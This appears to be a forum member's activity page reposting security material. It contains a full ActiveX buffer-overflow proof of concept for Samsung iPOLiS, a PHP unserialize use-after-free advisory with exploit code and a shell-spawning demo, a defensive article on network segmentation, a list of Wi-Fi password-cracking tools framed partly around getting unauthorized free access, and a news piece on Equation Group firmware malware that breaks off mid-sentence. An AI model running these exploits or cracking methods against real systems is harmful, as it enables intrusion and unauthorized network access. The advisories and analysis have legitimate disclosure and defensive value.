Jump to content

Aerosol

Active Members
 View Profile  See their activity

  • Posts

    3453

  • Joined

  • Last visited

  • Days Won

    22

 Content Type 

Everything posted by Aerosol

  1. Aerosol
    <!-- # Exploit Title: (0day)Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue Remote Code Execution PoC (CVE-2015-0555) # Date: 22/02/2015 # Exploit Author: Praveen Darshanam # Vendor Homepage: *https://www.samsung-security.com/Tools/device-manager.aspx # Version: Samsung iPOLiS 1.12.2 # Tested on: Windows 7 Ultimate N SP1 # CVE: 2015-0555 --> <html> <!-- Vulnerability found and PoC coded by Praveen Darshanam http://blog.disects.com CVE-2015-0555 targetFile = "C:\Program Files\Samsung\iPOLiS Device Manager\XnsSdkDeviceIpInstaller.ocx" prototype = "Function WriteConfigValue ( ByVal szKey As String , ByVal szValue As String ) As Long" memberName = "WriteConfigValue" progid = "XNSSDKDEVICELib.XnsSdkDevice" Operating System = Windows 7 Ultimate N SP1 Vulnerable Software = Samsung iPOLiS 1.12.2 CERT tried to coordinate but there wasn't any response from Samsung --> <head> Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue Remote Code Execution PoC </head> <object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target'> </object> <script> var arg1 = ""; var arg2="praveend"; for (i=0; i<= 15000; i++) { arg1 += "A"; } target.WriteConfigValue(arg1 ,arg2); </script> </html> <!-- #############Stack Trace#################### Exception Code: ACCESS_VIOLATION Disasm: 149434 MOV AL,[ESI+EDX] Seh Chain: -------------------------------------------------- 1 647C7D7D mfc100.dll 2 647D0937 mfc100.dll 3 64E242CA VBSCRIPT.dll 4 77B3E0ED ntdll.dll Called From Returns To -------------------------------------------------- XNSSDKDEVICE.149434 41414141 41414141 414141 414141 3DA4C4 3DA4C4 mfc100.647790C1 mfc100.647790C1 56746C75 Registers: -------------------------------------------------- EIP 00149434 EAX 00003841 EBX 00609FB0 -> 0015A564 ECX 00003814 EDX 00414141 EDI 0000008F ESI 0000008F EBP 002BE5FC -> Asc: AAAAAAAAAAA ESP 002BE564 -> 0000000C Block Disassembly: -------------------------------------------------- 149423 XOR EDI,EDI 149425 XOR ESI,ESI 149427 MOV [EBP-8C],ECX 14942D TEST ECX,ECX 14942F JLE SHORT 00149496 149431 MOV EDX,[EBP+8] 149434 MOV AL,[ESI+EDX] <--- CRASH 149437 CMP AL,2F 149439 JNZ SHORT 00149489 14943B MOV ECX,EBX 14943D TEST ESI,ESI 14943F JNZ SHORT 0014944D 149441 PUSH 159F28 149446 CALL 0014F7C0 14944B JMP SHORT 00149476 ArgDump: -------------------------------------------------- EBP+8 00414141 EBP+12 003DA4C4 -> Asc: defaultV EBP+16 647790C1 -> EBE84589 EBP+20 FFFFFFFE EBP+24 646CBE5C -> CCCCCCC3 EBP+28 0000001C Stack Dump: -------------------------------------------------- 2BE564 0C 00 00 00 00 E6 2B 00 B0 93 14 00 14 38 00 00 [................] 2BE574 C4 A4 3D 00 41 41 41 41 41 41 41 41 41 41 41 41 [................] 2BE584 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................] 2BE594 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................] 2BE5A4 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................] --> Source
  2. Aerosol
    Use After Free Vulnerability in unserialize() with DateTime* [CVE-2015-0273] Taoguang Chen <[@chtg](http://github.com/chtg)> - Write Date: 2015.1.29 - Release Date: 2015.2.20 A use-after-free vulnerability was discovered in unserialize() with DateTime/DateTimeZone/DateInterval/DatePeriod objects's __wakeup() magic method that can be abused for leaking arbitrary memory blocks or execute arbitrary code remotely. Affected Versions ------------ Affected is PHP 5.6 < 5.6.6 Affected is PHP 5.5 < 5.5.22 Affected is PHP 5.4 < 5.4.38 Credits ------------ This vulnerability was disclosed by Taoguang Chen. Description ------------ static int php_date_initialize_from_hash(php_date_obj **dateobj, HashTable *myht) { zval *z_date; zval *z_timezone; zval *z_timezone_type; zval tmp_obj; timelib_tzinfo *tzi; php_timezone_obj *tzobj; z_date = zend_hash_str_find(myht, "date", sizeof("data")-1); if (z_date) { convert_to_string(z_date); z_timezone_type = zend_hash_str_find(myht, "timezone_type", sizeof("timezone_type")-1); if (z_timezone_type) { convert_to_long(z_timezone_type); z_timezone = zend_hash_str_find(myht, "timezone", sizeof("timezone")-1); if (z_timezone) { convert_to_string(z_timezone); ... static int php_date_timezone_initialize_from_hash(zval **return_value, php_timezone_obj **tzobj, HashTable *myht TSRMLS_DC) { zval **z_timezone = NULL; zval **z_timezone_type = NULL; if (zend_hash_find(myht, "timezone_type", 14, (void**) &z_timezone_type) == SUCCESS) { if (zend_hash_find(myht, "timezone", 9, (void**) &z_timezone) == SUCCESS) { convert_to_long(*z_timezone_type); if (SUCCESS == timezone_initialize(*tzobj, Z_STRVAL_PP(z_timezone) TSRMLS_CC)) { return SUCCESS; } } } return FAILURE; } The convert_to_long() leads to the ZVAL and all its children is freed from memory. However the unserialize() code will still allow to use R: or r: to set references to that already freed memory. There is a use after free vulnerability, and allows to execute arbitrary code. Proof of Concept Exploit ------------ The PoC works on standard MacOSX 10.10.2 installation of PHP 5.5.14. <?php $f = $argv[1]; $c = $argv[2]; $fakezval1 = ptr2str(0x100b83008); $fakezval1 .= ptr2str(0x8); $fakezval1 .= "\x00\x00\x00\x00"; $fakezval1 .= "\x06"; $fakezval1 .= "\x00"; $fakezval1 .= "\x00\x00"; $data1 = 'a:3:{i:0;O:12:"DateTimeZone":2:{s:13:"timezone_type";a:1:{i:0;i:1;}s:8:"timezone";s:3:"UTC";}i:1;s:'.strlen($fakezval1).':"'.$fakezval1.'";i:2;a:1:{i:0;R:4;}}'; $x = unserialize($data1); $y = $x[2]; // zend_eval_string()'s address $y[0][0] = "\x6d"; $y[0][1] = "\x1e"; $y[0][2] = "\x35"; $y[0][3] = "\x00"; $y[0][4] = "\x01"; $y[0][5] = "\x00"; $y[0][6] = "\x00"; $y[0][7] = "\x00"; $fakezval2 = ptr2str(0x3b296324286624); // $f($c); $fakezval2 .= ptr2str(0x100b83000); $fakezval2 .= "\x00\x00\x00\x00"; $fakezval2 .= "\x05"; $fakezval2 .= "\x00"; $fakezval2 .= "\x00\x00"; $data2 = 'a:3:{i:0;O:12:"DateTimeZone":2:{s:13:"timezone_type";a:1:{i:0;i:1;}s:8:"timezone";s:3:"UTC";}i:1;s:'.strlen($fakezval2).':"'.$fakezval2.'";i:2;O:12:"DateTimeZone":2:{s:13:"timezone_type";a:1:{i:0;R:4;}s:8:"timezone";s:3:"UTC";}}'; $z = unserialize($data2); function ptr2str($ptr) { $out = ""; for ($i=0; $i<8; $i++) { $out .= chr($ptr & 0xff); $ptr >>= 8; } return $out; } ?> Test the PoC on the command line, then any PHP code can be executed: $ lldb php (lldb) target create "php" Current executable set to 'php' (x86_64). (lldb) run uafpoc.php assert "system\('sh'\)==exit\(\)" Process 13472 launched: '/usr/bin/php' (x86_64) sh: no job control in this shell sh-3.2$ php -v PHP 5.5.14 (cli) (built: Sep 9 2014 19:09:25) Copyright (c) 1997-2014 The PHP Group Zend Engine v2.5.0, Copyright (c) 1998-2014 Zend Technologies sh-3.2$ exit exit Process 13472 exited with status = 0 (0x00000000) (lldb) Source
  3. Aerosol
    Introduction Last year – dubbed “the Year of the Hack” – saw numerous major cyber attacks against prominent corporations, including JP Morgan bank and Sony Pictures Entertainment. And after Target in 2013, another retailer, Home Depot, suffered a data breach with more than 56 million credit cards stolen. The consequences of these incidents can be devastating in terms of reputation damage and lawsuits that have been filed, charging negligent IT security control. Hackers exposed lots of poorly protected systems, and we should ask ourselves: What’s wrong here? It seems likely that data traffic security and network security have not kept abreast with the technological innovation. This article attempts to gain insight into some of the current issues related to the subject matter, such as proper data encryption, network segmentation, traffic originating from mobile devices, etc. Network Segmentation & Data Encryption Regulatory guidelines that ensure a general standard of compliance focus on traffic encryption for that data that traverse external or public networks, whereas local, inner-core networks are protected by means of logical network segmentation. Isolation of sensitive data on specific internal network repositories and cryptographic segmentation are common security standards today for many institutions that operate with loads of private and confidential information, e.g., banks and hospitals. Network segmentation is possible through technologies like firewalls and routing subnets. On the other hand, the encryption process for data in motion utilizes a large number of forms of encryption ranging from Web-based/HTTPS encryption to SSL-based VPNs. Enhanced Security with Proper Network Segmentation a) Unauthorized network access can be limited through network segmentation or security “zoning”. This mitigation technique will withhold the propagation of a threat, for instance, malicious actors attempting to move across the network. At the same time, segregating the network properly will enable access to those persons who are authorized. Firewalls and VLANs have a function that can partition the network into multiple zones. Multiple layers of control within the network – IT security corporations are more and more interested in dealing with network segmentation errors. But security is not the only problem with configuring proper network segmentation. Beware that while adding more security layers can impede access by cybercriminals, it can also have a negative impact on business dealings if the configuration is not user-friendly enough. Hence, we are obligated to take into consideration other key benefits associated with well-segmented networks, namely, “the ability to contain network problems, improve performance, and reduce congestion.” Diagram 1 “Example of Network Segmentation (Part 1)” Diagram 2 “Example of Network Segmentation (Part 2)” VLAN Network Segmentation and Security Network segmentation with virtual local area networks (VLANs) breaks a network into a number of isolated, smaller networks within the data center. Each of these networks operates as a separate logical broadcast domain. A proper VLAN segmentation can hinder significantly threat actors from accessing the system surface, and simultaneously diminishes their packet-sniffing capabilities. Furthermore, VLANs authorize legitimate users to access only those servers and devices related to their duties. VLANs have a positive unloading effect on network performance because the massive broadcast domains are divided into easily-manoeuvrable small parts. VLANs provide organizational flexibility, allowing administrators to group segmented mini-networks based on categories such as function, application, and project team. Lastly, VLANs can give secure but convenient user mobility to users assigned to a particular VLAN, since they can remain connected to that VLAN irrespective of location. What do the critics say about VLANs? VLANs are unable to enforce reliable control of privileged information because they simply isolate network traffic. It is deemed that they cannot inspect this traffic for threats. Moreover, along with other traditional tools, e.g., internal firewalls, VLANs can be a point of failure as far as security, flexibility, and management is concerned. That is because: “they necessitate physically changing the network topology to create or modify a secure domain; firewall rules to control user access incur time-consuming work-around fixes for authorized users; and security measures such as encrypting internal traffic isn’t always possible.” Next-Generation Networks Software Defined Networking (SDN), Network virtualization (NV), and Network Functions Virtualization (NFV) present an advanced software-based approach to IT virtualization of entire network architecture. A citation from this document illustrates in a few words the basic characteristics of these cutting-edge technologies: Software Defined Networking (SDN) In October 2013, the Open Networking Foundation (ONF) issued a research report in which two potential security challenges related to SDN were addressed: The centralized controller as a “potential single point of attack and failure.” The southbound interface between the controller and data-forwarding devices is “vulnerable to threats that could degrade the availability, performance and integrity of the network.” Measures within the SDN’s architecture: Secure the access to the Controller— protecting the Controller means protecting your SDN; Create a trusted network environment between the SDN Controller, the applications, the devices, which will protect the communications throughout the network; Enforce a robust policy framework to constantly check on the proper functioning of the SDN Controller; Enforce Remediation + Forensics procedures when necessary (i.e., recovery mechanisms, reporting, and analysis). Security outside the architecture can be embedded either in servers, storage and other computing apparatuses. Network Functions Virtualization (NFV) There are two basic security threats for NFVs: 1) A combination of all generic visualization threats; 2) Threats specific to the network function software. However, virtualization gives some complementary security by eliminating or mitigating several kinds of threats typical for the network function software with the help of new elements like centralized security management and hypervisor introspection. For improving the NFV’s security, Andreas Lemke advises users to utilize the following two-pronged combination: “Reducing generic virtualization threats as much as possible by securing the virtualization platform Eliminating as many network function-specific threats as possible by applying NFV-enabled security mechanisms, such as hypervisor-based protection” Drafting a stringent security policy on what is to be transferred from zone to zone is the next step. Accidental access of third parties to your network must be restricted to cases when it is absolutely needed and areas where there is no other information beyond what is required. A zone that contains highly sensitive data should be isolated as much as possible from the rest of the network, but it should not pose an undue burden on the overall data traffic. Tag zones differently depending on the type of data they contain. With regard to the previous point, be sure that a sensitive type of information is not within the reach of an unauthorized third party. Define “good faith”, innocuous communication paths and block suspicious data traffic. Building an enormous matrix of segregated zones may entail drafting a policy for traffic management between zones. Due to security changes over time, frequent changes in the policy have to be made as well so that the policy in question can respond to the present security dynamics of this new network environment. There are standards that can provide guidance on how to set up efficient separation of data within the network. The Payment Card Industry Data Security Standard (PCI-DSS) is such, and in this case sensitive information like payment card data should be isolated from the rest of the network. Case Study: Target Data Breach As some of the recent data breaches have shown, improper network segmentation can result in exposure of your data to system outages or theft. Stolen third-party credentials can be further exploited for getting a foothold in entire networks. That was the case with the infamous Target data leakage in December 2013. According to Jody Brazil, founder of the security vendor FireMon, Target failed to secure in a proper fashion the access of third parties to their payment systems. A main lapse seems to be the fact that they did not segment the network to ensure that sensitive cardholder data was separated from what outsiders can access – which is a noncompliance in itself with a ubiquitous security practice pursuant to the aforementioned PCI-DSS. Finally, Brazil concludes that despite the sophisticated nature of the malware used to intercept and steal payment card data from the company’s Point-of-sale (POS) systems, the attacker would have been stopped at the installation phase if Target had followed network segmentation procedures in the first place. Enhanced Security with Proper Encryption The classical security architecture counts on establishment of a trusted internal network guarded by firewalls. Thus, applications in the safe zone are deemed totally trustworthy. Security analysts bring these assumptions into question. As if the old maxima “Hope for the best and prepare for (assume) the worst” is better justified in terms of real-deal proactive security measures like encryption, especially for preservation of sensitive data. A survey conducted by Spiceworks, a professional network for IT specialists, ascertains that 76% of the IT managers use at least two forms of encryption to ensure that the data traffic of their enterprises is secure. Astonishingly, one out of three admits that he is forced to use three or more kinds of encryption or VPNs for data in motion. It seems clear that this might be a security problem, since these managers cannot reach some form of consensus concerning the promulgation of a uniform and consistent encryption policy, which would encompass all network segments and applications under its belt. Consequently, all gaps and inconsistencies in data traffic security are an aftermath of the existent fragmented environment. Corporations encounter difficulties with encryption management chiefly because of the fragmentation, which has a performance impact on firewalls and network devices. The direct effect of these issues is felt in the form of deployment of less than ideal data traffic security to compensate for shortcomings existing in network systems and firewalls – a dangerous trade-off that IT managers are bound to do. The following statistic reflects on the aforementioned subject: “45% of the respondents said encryption is too difficult to manage to use for segmentation, while 36 percent cited the performance hit on firewalls and network devices when encryption is turned on.” Presumably, the coordination of extremely fragmented, fractured means of data encryption and segmentation is often an arduous chore. Is it abstaining from encrypting a viable alternative? Highly unlikely. Nevertheless, more than half of the surveyed organizations confirm that concerns about performance quality preclude them from opting for this multiple encryption. II. Mobile Data Traffic and Network Security The mobile unencrypted traffic from apps is growing each month. At the moment 49% of all app traffic is unencrypted, which means that it is vulnerable to snooping and injection cyber attacks. These pose a significant threat to the normal functioning of day-to-day business operations. Interestingly, outsiders finding a loophole in the corporate network is not as frequent of a security nuisance as unsuspecting employees opening a door to a malicious cyber attack. Most users (72%) do not feel uncomfortable (at least at the beginning) with sharing sensitive information in their apps, such as credit card details and passwords. Diagram 3 Source: http://commons.wikimedia.org/wiki/File:Consumerization_Report_-_Chart_3.jpg (by Cgarlati). Bring Your Own Device (BYOD) Many people in Western countries have up to five Internet-connectable devices and 300 identities across a great number of online shopping portals and social media – an ongoing tendency that ushers in the bring your own device (BYOD) revolution. From a business point of view, there is a monetary as well as reputational risk associated with not being able to protect the data trusted to them because of the increasing adoption of personal devices in the workplace. And from a data transfer perspective, the equation gets even more complicated when cloud-based platforms allow employees to access business information regardless of geographic location. Besides proper employee management (that could be an IT security training of personnel), identity control based on staff movement restrictions across virtual, cloud and physical environment is vital for complying with the current standards in terms of efficiency and security. The silo style of mobility Mobile-device management and enterprise-mobility management have been developed by enterprises to manage devices like tablets and smartphones. Under the standard approach, these two systems integrate with a VPN server, for instance, to set up an encrypted data connection to the company. The silo-based nature of all mobile devices, however, localize the perimeter protection to the company’s boundaries. Consequently, if an employee has credentials on his mobile device, a malicious actor can obtain and leverage them to gain unfettered access to internal networks. And we all know that personal devices typically do not possess antivirus/antimalware software and often share information with untrustworthy apps. The security threat stems from the fact that all internal networks of the corporation continue to be considered “safe” and “trusted” (See Diagram 4). As a result, enterprises often use insufficient controls to segment data traffic and secure or isolate internal applications containing sensitive servers. Diagram 4 Conclusion The Spiceworks survey reported that improving network security was put on the priority agenda for the IT sector in 2015. Allocating funds to network security projects for this years is envisaged by approximately two-thirds of all enterprises participating in the interview. We can only hope that these measures will not come as “too little, too late”. And while the investment in the reconstruction of outdated network architectures and data traffic mechanisms is important, we should not forget to adjust our personal perception to these changes. Reference List Boone, A. (2015). Network Security Trends and Outlook. Retrieved on 15/02/2015 from https://www.sdxcentral.com/articles/contributed/network-security-trends-and-outlook-2015/2015/01/ Boone, A. (2015). 2015 Predictions: Mobile security set for change in 2015. Retrieved on 15/02/2015 from http://www.rcrwireless.com/20150109/opinion/2015-predictions-mobile-security-set-for-change-in-2015-tag10 Certes (2015). Solving the data traffic encryption tangle. Retrieved on 15/02/2015 from http://certesnetworks.com/blog/solving-the-data-traffic-encryption-tangle/ Cryptozone. Network Segmentation. Retrieved on 15/02/2015 from http://www.cryptzone.com/solutions/network-segmentation Forsyth, L. (2012). Poor data security can cause lasting damage to your enterprise. Retrieved on 15/02/2015 from http://www.theguardian.com/media-network/media-network-blog/2012/dec/13/internet-data-security-enterprise Harrison, R. (2014). Network Segmentation Key To Good Network Hygiene. Retrieved on 15/02/2015 from http://www.networkcomputing.com/networking/network-segmentation-key-to-good-network-hygiene/a/d-id/1269687 McGillicuddy, S. (2014). SDN security issues: How secure is the SDN stack? Retrieved on 15/02/2015 from http://searchsdn.techtarget.com/news/2240214438/SDN-security-issues-How-secure-is-the-SDN-stack Natarajan, P. (2014). Rock-solid Data Traffic Security in a Virtualized Network World. Retrieved on 15/02/2015 from www.ciena.com/connect/blog/Rock-solid-Data-Traffic-Security-in-a-Virtualized-Network-World.html Open Networking Foundation (2013). SDN Security Considerations in the Data Center. Retrieved on 15/02/2015 from https://www.opennetworking.org/images/stories/downloads/sdn-resources/solution-briefs/sb-security-data-center.pdf Olzak, T. (2012). VLAN Network Segmentation and Security- Chapter 5. Retrieved on 15/02/2015 from http://resources.infosecinstitute.com/vlan-network-chapter-5/ Palo Alto Networks. Zero Trust Approach To Network Segmentation. Retrieved on 15/02/2015 from https://www.paloaltonetworks.com/solutions/initiative/network-segmentation.html Philbin (2014). Mobile Data Trends Report shows nearly half of app traffic now unencrypted. Retrieved on 15/02/2015 from https://www.wandera.com/blog/mobile-data-trends-report-shows-nearly-half-of-app-traffic-now-unencrypted/ Reichenberg, N. (2014). Improving Security via Proper Network Segmentation. Retrieved on 15/02/2015 from http://www.securityweek.com/improving-security-proper-network-segmentation SDNCentral. SDN Security Challenges in SDN Environments. Retrieved on 15/02/2015 from https://www.sdxcentral.com/resources/security/security-challenges-sdn-software-defined-networks/ TrendMicro (2013). Catch Evasive Threats That Hide Behind Real Network Traffic. Retrieved on 15/02/2015 from www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-network-detection-evasion-methods.pdf Vijayan, J. (2014). Target breach happened because of a basic network segmentation error. Retrieved on 15/02/2015 from http://www.computerworld.com/article/2487425/cybercrime-hacking/target-breach-happened-because-of-a-basic-network-segmentation-error.html Diagram 1 and 2 are based on graphs in: Raza, K. (2015). Network Segmentation & SD-WAN. Retrieved on 15/02/2015 from http://www.networkcomputing.com/networking/network-segmentation-and-sd-wan/a/d-id/1318634 Source
  4. Aerosol
    Internet is now the basic need of our daily life. With the increasing use of smartphones, most of the things are now online. Every time we have to do something, we just use our smartphone or desktop. This is the reason wi-fi hotspots can be found everywhere. People also use wireless in their home network to connect all devices. Every person can see the neighborhood wi-fi networks in the system, and they want to use it for free. But most these networks are secured with a password key. You need to know this security key to access the network. When your own network is down, you will desperately want to connect to these neighborhood networks. For this, people generally search for wi-fi password cracking tools to get unauthorized access to those wireless networks. Sometimes when you are on a network, you also want to check what is happening on the network. This happens mostly in big organizations, when an employer wants to check who is doing what in the network. For these things, there are a few network hacking tools available that let users analyze packets and see what other users are doing. In this article, I am going to discuss wireless security and best wi-fi password cracking or recovery tools. I will explain the kind of encryption wireless networks use and how these tools can crack the networks to get access. We will also see what tools let users monitor networks. Wireless Networks and Hacking Wireless networks are based on IEEE 802.11 standards defined by IEEE(Institute of Electrical and Electronics Engineers) for ad hoc networks or infrastructure networks. Infrastructure networks have one or more access points which coordinate the traffic between the nodes. But in ad hoc networks, there is no access point; each node connects in a peer-to-peer way. Basically there are two types of vulnerabilities which can be found in the Wireless LAN. One is poor configuration and the other is poor encryption. Poor configuration is caused by the network admin who manages the network. It may include the weak password, no security settings, use of default configurations, and other user related things. Poor encryption is related to security keys used to protect the wireless network. It is there because of issues in WEP or WPA. WEP and WPA WEP and WPA are the two main security protocols used in Wi-Fi LAN. WEP is known as Wired Equivalent Privacy (WEP). It is a deprecated security protocol which was introduced back in 1997 as a part of original 802.11 standards. But it was weak, and several serious weakness were found in the protocol. Now, this can be cracked within minutes. So, a new kind of security protocol was introduced in 2003. This new protocol was Wi-Fi Protected Access (WPA). It has mainly two versions, 1 and 2 (WPA and WPA2). Now it is the current security protocol used in wireless networks. To get unauthorized access to a network, one needs to crack these security protocols. There are many tools which can crack Wi-Fi encryption. These tools can either take advantage of WEP weaknesses or use bruteforce attacks on WPA/WPA2. I am sure now you know that you should never use WEP security. Basically wireless hacking tools are of two types. One of which can be used to sniff the network and monitor what is happening in the network. And other kinds of tools are used to hack WEP/WPA keys. These are the popular tools used for wireless password cracking and network troubleshooting. 1. Aircrack Aircrack is one of the most popular wireless passwords cracking tools which you can use for 802.11a/b/g WEP and WPA cracking. Aircrack uses the best algorithms to recover wireless passwords by capturing packets. Once enough packets have been gathered, it tries to recover the password. To make the attack faster, it implements a standard FMS attack with some optimizations. The company behind the tool also offers an online tutorial where you can learn how to install and use this tool to crack wireless passwords. It comes as Linux distribution, Live CD and VMware image options. You can use any of these. It supports most of the wireless adapters and is almost guaranteed to work. If you are using a Linux distribution, the only drawback of the tool is that it requires deeper knowledge of Linux. If you are not comfortable with Linux, you will find it hard to use this tool. In this case, try Live CD or VMWare image. VMWare Image needs less knowledge, but it only works with a limited set of host OS, and only USB devices are supported. Before you start using this too, confirm that the wireless card can inject packets. Then start WEP cracking. Read the online tutorial on the website to know more about the tool. If you will follow steps properly, you will end up getting success with this tool. Download: http://www.aircrack-ng.org/ 2. AirSnort AirSnort is another popular tool for decrypting WEP encryption on a wi-fi 802.11b network. It is a free tool and comes with Linux and Windows platforms. This tool is no longer maintained, but it is still available to download from Sourceforge. AirSnort works by passively monitoring transmissions and computing encryption keys once it has enough packets received. This tool is simple to use. If you are interested, you can try this tool to crack WEP passwords. Download: http://sourceforge.net/projects/airsnort/ 3. Cain & Able Cain & Able is a popular password cracking tool. This tool is developed to intercept network traffic and then discover passwords by bruteforcing the password using cryptanalysis attack methods. It can also recover wireless network keys by analyzing routing protocols. It you are trying to learn wireless security and password cracking, you should once try this tool. Download: http://www.oxid.it/cain.html 4. Kismet Kismet is the wi-fi 802.11 a/b/g/n layer2 wireless network sniffer and IDS. It works with any wi-fi card which supports rfmon mode. It passively collects packets to identify networks and detect hidden networks. It is built on client/server modular architecture. It is available for Linux, OSX, Windows and BSD platforms. Download: http://www.kismetwireless.net/ 5. NetStumbler NetStumbler is a popular Windows tool to find open wireless access points. This tool is free and is available for Windows. A trimmed down version of the tool is also available. It is called MiniStumbler. Basically NetStumblet is used for wardriving, verifying network configurations, finding locations with a poor network, detecting unauthorized access points, and more. But the tool also has a big disadvantage. It can be easily detected by most of the wireless intrusion detection systems available. This is because it actively probes a network to collect useful information. Another disadvantage of the tool is that it does not work properly with the latest 64 bit Windows OS. This is because the tool was last updated back in April 2004. It has been around 11 years since the last stable release of the tool. Download Netstumbler: http://www.stumbler.net/ 6. inSSIDer inSSIDer is a popular Wi-Fi scanner for Microsoft Windows and OS X operating systems. Initially the tool was opensource. Later it became premium and now costs $19.99. It was also awarded as “Best Opensource Software in Networking”. The inSSIDer wi-fi scanner can do various tasks, including finding open wi-fi access points, tracking signal strength, and saving logs with GPS records. Download inSSIDer: http://www.inssider.com/ 7. WireShark WireShark is the network protocol analyzer. It lets you check what is happening in your network. You can live capture packets and analyze them. It captures packets and lets you check data at the micro-level. It runs on Windows, Linux, OS X, Solaries, FreeBSD and others. WireShark requires good knowledge of network protocols to analyze the data obtained with the tool. If you do not have good knowledge of that, you may not find this tool interesting. So, try only if you are sure about your protocol knowledge. Download Wireshark: https://www.wireshark.org/ 8. CoWPAtty CoWPAtty is an automated dictionary attack tool for WPA-PSK. It runs on Linux OS. This program has a command line interface and runs on a word-list that contains the password to use in the attack. Using the tool is really simple, but it is slow. That’s because the hash uses SHA1 with a seed of SSID. It means the same password will have a different SSIM. So, you cannot simply use the rainbow table against all access points. So, the tool uses the password dictionary and generates the hack for each word contained in the dictionary by using the SSID. The new version of the tool tried to improve the speed by using a pre-computed hash file. This pre-computed file contains around 172000 dictionary file for around 1000 most popular SSIs. But if your SSID is not in those 1000, you are unlucky. Download CoWPAtty: http://sourceforge.net/projects/cowpatty/ 9. Airjack Airjack is a Wi-Fi 802.11 packet injection tool. This wireless cracking tool is very useful in injecting forged packets and making a network down by denial of service attack. This tool can also be used for a man in the middle attack in the network. Download AirJack: http://sourceforge.net/projects/airjack/ 10. WepAttack WepAttack is an open source Linux tool for breaking 802.11 WEP keys. This tool performs an active dictionary attack by testing millions of words to find the working key. Only a working WLAN card is required to work with WepAttack. Download WebAttack: http://wepattack.sourceforge.net/ 11. OmniPeek OmniPeek is another nice packet sniffer and network analyzer tool. This tool is commercial and supports only Windows operating systems. This tool is used to capture and analyze wireless traffic. But it requires you to have good knowledge of protocols to properly understand things. A good thing is that the tool works with most of the network interface cards available in market. This tool is used for network troubleshooting. This tool also supports plugins, and 40 plugins are already available to extend the features of the tool. Download: http://www.wildpackets.com/products/distributed_network_analysis/omnipeek_network_analyzer 12. CommView for WiFi CommView for WiFi is another popular wireless monitor and packet analyzer tool. It comes with an easy to understand GUI. It works fine with 802.11 a/b/g/n/ac networks. It captures every packet and displays useful information as a list. You can get useful information like access points, stations, signal strength, network connections and protocol distribution. Captured packets can be decrypted by user-defined WEP or WPA keys. This tool is basically for wi-fi network admins, security professionals, and home users who want to monitor their wi-fi traffic and programmers working on software for wireless networks. Download CommView: http://www.tamos.com/products/commwifi/ 13. CloudCracker CloudCracker is the online password cracking tool for cracking WPA protected wi-fi networks. This tool can also be used to crack different password hashes. Just upload the handshake file, enter the network name and start the tool. This tool has a huge dictionary of around 300 million words to perform attacks. Try Cloudcracker: https://www.cloudcracker.com/ Conclusion In this post, I discussed 13 wireless hacking tools. A few wireless hacking tools are for cracking the password to get unauthorized access, and a few are for monitoring and troubleshooting the network. But most of the people really interested in tools to crack wireless hotspots just want to get free Internet access. The above collection also contains those tools which try a dictionary attack to crack wi-fi passwords to allow you to get free Internet access. But be sure not to use these tools in a risky place. Hacking wireless networks to get unauthorized access may be a crime in your country. You may get into trouble for using these tools. So, please do not use these tools for illegal works. As I already mentioned, you should never use the WEP encryption key in your home or wireless network. With available tools, it is child’s play to crack the WEP keys and access your wi-fi network. Wireless monitoring and troubleshooting tools are basically for network admins and programmers working on wi-fi based software. These tools really help when some of your systems face problems in connecting to the network. I hope you enjoyed this article and got relevant information about popular wireless hacking and password cracking tools. I tried my best to compile this list of password hacking tools, but as a human error, I may miss something. If I forgot any important tool in this, please let me know in the comments. Source
  5. Aerosol
    One of the most shocking parts of the recently discovered spying network Equation Group is its mysterious module designed to reprogram or reflash a computer hard drive’s firmware with malicious code. The Kaspersky researchers who uncovered this said its ability to subvert hard drive firmware—the guts of any computer—“surpasses anything else” they had ever seen. The hacking tool, believed to be a product of the NSA, is significant because subverting the firmware gives the attackers God-like control of the system in a way that is stealthy and persistent even through software updates. The module, named “nls_933w.dll”, is the first of its kind found in the wild and is used with both the EquationDrug and GrayFish spy platforms Kaspersky uncovered. It also has another capability: to create invisible storage space on the hard drive to hide data stolen from the system so the attackers can retrieve it later. This lets spies like the Equation Group bypass disk encryption by secreting documents they want to seize in areas that don’t get encrypted. Kaspersky has so far uncovered 500 victims of the Equation Group, but only five of these had the firmware-flashing module on their systems. The flasher module is likely reserved for significant systems that present special surveillance challenges. Costin Raiu, director of Kaspersky’s Global Research and Analysis Team, believes these are high-value computers that are not connected to the internet and are protected with disk encryption. Here’s what we know about the firmware-flashing module. How It Works Hard drive disks have a controller, essentially a mini-computer, that includes a memory chip or flash ROM where the firmware code for operating the hard drive resides. When a machine is infected with EquationDrug or GrayFish, the firmware flasher module gets deposited onto the system and reaches out to a command server to obtain payload code that it then flashes to the firmware, replacing the existing firmware with a malicious one. The researchers uncovered two versions of the flasher module: one that appears to have been compiled in 2010 and is used with EquatinoDrug and one with a 2013 compilation date that is used with GrayFish. The Trojanized firmware lets attackers stay on the system even through software updates. If a victim, thinking his or her computer is infected, wipes the computer’s operating system and reinstalls it to eliminate any malicious code, the malicious firmware code remains untouched. It can then reach out to the command server to restore all of the other malicious components that got wiped from the system. Even if the firmware itself is updated with a new vendor release, the malicious firmware code may still persist because some firmware updates replace only parts of the firmware, meaning the malicious portions may not get overwritten with the update. The only solution for victims is to trash their hard drive and start over with a new one. The attack works because firmware was never designed with security in mind. Hard disk makers don’t cryptographically sign the firmware they install on drives the way software vendors do. Nor do hard drive disk designs have authentication built in to check for signed firmware. This makes it possible for someone to change the firmware. And firmware is the perfect place to conceal malware because antivirus scanners don’t examine it. There’s also no easy way for users to read the firmware and manually check if it’s been altered. The firmware flasher module can reprogram the firmware of more than a dozen different hard drive brands, including IBM, Seagate, Western Digital, and Toshiba. “You know how much effort it takes to land just one firmware for a hard drive? You need to know specifications, the CPU, the architecture of the firmware, how it works,” Raiu says. The Kaspersky researchers have called it “an astonishing technical accomplishment and is testament to the group’s abilities.” Once the firmware is replaced with the Trojanized version, the flasher module creates an API that can communicate with other malicious modules on the system and also access hidden sectors of the disk where the attackers want to conceal data they intend to steal. They hide this data in the so-called service area of the hard drive disk where the hard disk stores data needed for its internal operation. Hidden Storage Is the Holy Grail The revelation that the firmware hack helps store data the attackers want to steal didn’t get much play when the story broke last week, but it’s the most significant part of the hack. It also raises a number of questions 